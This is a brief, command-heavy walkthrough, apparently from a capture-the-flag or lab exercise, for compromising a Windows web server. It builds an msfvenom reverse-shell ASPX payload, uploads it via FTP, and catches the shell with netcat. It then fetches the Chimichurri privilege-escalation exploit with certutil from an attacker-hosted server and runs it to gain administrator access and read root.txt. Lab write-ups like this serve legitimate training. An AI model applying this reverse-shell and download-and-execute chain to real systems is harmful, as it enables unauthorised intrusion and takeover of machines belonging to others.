Create a non meterpreter shell:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.19 LPORT=4444 -f aspx > manual.aspxFTP to victim machine:
ftp 10.10.10.5open listener with the same port as creating shell:
nc -nvlp 4444Navigate to website:
10.10.10.5/manual.aspxShould have shell.
Find an exploit that works (we found Chimichurri 59) and download it
get it there:
host a python server in the downloads folder (or whererever it is):
cd Downloads/
python3 -m http.server 8080on the victim/windows:
Go to temp folder:
cd c:\windows\tempwget for windows is certutil
certutil -urlcache -f http://10.10.14.19:8080/Chimichurri.exe ms.exe-f is file
Chimichurri.exe is the name of what we downloaded
To check it’s there you can:
dir #and check for ms.exeFind out usage. Chimichurri usage:
ms.exe 10.10.14.19 5555the exe, attacker machine IP, port opened on netcat on Kali (open a new one before hitting enter)
cd to desktop:
cd c:\users\administrator\desktopcat file:
type root.txt